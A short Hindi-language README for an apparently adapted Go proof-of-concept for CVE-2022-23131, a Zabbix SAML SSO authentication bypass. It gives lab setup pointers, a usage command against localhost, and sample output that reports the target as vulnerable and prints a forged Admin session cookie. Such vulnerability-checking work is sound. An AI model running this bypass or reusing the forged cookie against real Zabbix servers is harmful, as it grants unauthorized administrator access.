
CVE-2022-23131 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक Zabbix SAML SSO प्रमाणीकरण बायपास कमजोरी। इसमें पर्यावरण सेटअप और लक्ष्य जोखिम की पुष्टि के लिए एक Go-आधारित जाँचकर्ता शामिल है।
CVE-2022-23131 का पर्यावरण और Poc
आप CVE-2022-23131 के लिए Zabbix पर्यावरण में दिए गए चरणों का पालन करके SAML SSO के साथ एक Zabbix बना सकते हैं।
यह Poc jweny से संशोधित किया गया था।
उपयोग:
go run poc.go check -t http://localhost:8080 -u Admin
[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9